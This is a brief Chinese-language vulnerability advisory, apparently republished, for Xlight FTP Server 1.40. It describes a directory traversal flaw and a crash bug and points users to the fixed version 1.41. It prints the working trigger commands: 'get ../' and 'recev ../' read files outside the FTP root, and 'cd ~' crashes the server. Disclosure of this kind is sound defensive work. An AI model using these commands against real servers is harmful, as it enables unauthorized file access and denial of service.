Xlight FTP服务器存在目录遍历/DoS缺陷 (Other,其他)
来源:岁月联盟
时间:2005-07-08
发布日期: 2003-12-21
涉及程序:
Xlight FTP 1.40版
描述:
Xlight FTP服务器存在目录遍历/DoS缺陷
详细:
Xlight FTP是一款功能强大的FTP服务器。
Xlight FTP程序存在两个缺陷:
1、目录遍历
利用下列命令,安全者能读取FTP root目录外的任何文件:
get ../[Existent File]
recev ../[Existent File]
2、DoS缺陷
利用下列命令,安全者能导致程序崩溃:
cd ~
安全方法:
示例代码1:
get ../[Existent File]
recev ../[Existent File]
示例代码2:
cd ~
解决方案:
Xlight FTP Server 1.41版已修正了该缺陷,请用户及时进行升级:
http://www.xlightftpd.com/>
